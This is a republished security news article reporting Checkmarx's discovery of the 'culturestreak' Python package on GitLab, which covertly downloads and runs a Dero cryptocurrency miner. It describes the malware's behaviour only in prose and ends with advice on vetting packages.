Culturestreak Malware Lurks Inside GitLab Python Package

  /     /     /  
Publicated : 23/11/2024   Category : security


Culturestreak Malware Lurks Inside GitLab Python Package


The GitLab code hijacks computer resources to mine Dero cryptocurrency as part of a larger cryptomining operation.



In whats becoming an all-too-common occurrence in the current threat landscape, security researchers have found yet another malicious
open source package
, this time an active
Python file
on GitLab that hijacks system resources to mine cryptocurrency.
The package, called culturestreak, originates from an active repository on the GitLab developer site from a user named Aldri Terakhir, Checkmarx revealed in a
blog post
Sept. 19.
If downloaded and deployed, the package runs in an infinite loop that exploits system resources for unauthorized mining of
Dero cryptocurrency
as part of a larger cryptomining operation, according to Checkmarx.
Unauthorized mining operations like the one executed by the culturestreak package pose severe risks as they exploit your systems resources, slow down your computer, and potentially expose you to further risks, Checkmarx security researcher Yehuda Gelb wrote in the post.
The finding underscores the existing, persistent supply chain threat posed by opportunistic threat actors who poison open source packages that developers use to build software as a way to reach as many victims as possible with minimal effort.
Earlier this year, Checkmarx even launched a specific
threat intelligence API
 to identify malicious packages before they reach the software supply chain as a method of defense against this tactic.
Python packages
in particular have been a method of choice for hiding malicious payloads due to the popularity of the open source software platform for building software.
Python developers
often share code packages online via repositories like GitLab and GitHub, making it an easily accessible ecosystem for threat actors to exploit.
Threat actors have also targeted users of the
Python Package Index (PyPI)
in a
malicious social engineering campaign
that aimed to steal their credentials to load compromised packages to the repository itself.
Once deployed, culturestreak decodes several Base64-encoded strings in an obfuscation technique often used to hide sensitive information or to make it more difficult for someone to understand the codes intent.
In its first act of deception, the package decodes variables such as HOST, CONFIG, and FILE, which are then used in the subsequent steps of the operation. Then the malicious package sets the FILE variable, which serves as the filename for the downloaded malicious binary, to a random integer ranging from 1 to 999999.
A possible reason for this is to hamper the ability of antivirus or security software to detect malicious files based on fixed naming conventions, Gelb wrote.
Next, culturestreak attempts to download a binary file called “bwt2, which is is saved to the /tmp/ directory, a common location for temporary files on Unix-like systems. Though the researchers couldnt read the binary due to its obfuscation, they managed to reverse-engineer it to find it had been packed with the UPX executable packer, version 4.02.
Once unpacked, the researchers extracted a gcc binary file that turned out to be a known, optimized tool for mining Dero crypto on GitHub called astrominer 1.9.2 R4.
As mentioned earlier, the binary is programmed to run in an infinite loop, using hardcoded pool URLs and wallet addresses, indicating a calculated attempt to exploit the system resources for unauthorized
mining of cryptocurrency
[and] making it a relentless threat that continually exploits system resources, Gelb wrote.
Pool URLs are servers in which multiple users combine their computing power to mine cryptocurrency more efficiently, he explained. This means that the package is essentially turning your computer into a cog in a larger mining operation without your consent, Gelb added.
The discovery of the culturestreak malicious code package serves as yet another reminder of how important it is for developers to always vet
code and packages
from unverified or suspicious sources, Gelb wrote. Developers also should follow threat-intelligence sources to stay informed of potential threats to their software development.
Checkmarx provided a list of indicators of compromise (IoCs) in Gelbs post to help people identify if the malicious code package is running its cryptomining payload on their system.

Last News

▸ Beware EMV may not fully protect against skilled thieves. ◂
Discovered: 23/12/2024
Category: security

▸ Hack Your Hotel Room ◂
Discovered: 23/12/2024
Category: security

▸ Website hacks happened during World Cup final. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Culturestreak Malware Lurks Inside GitLab Python Package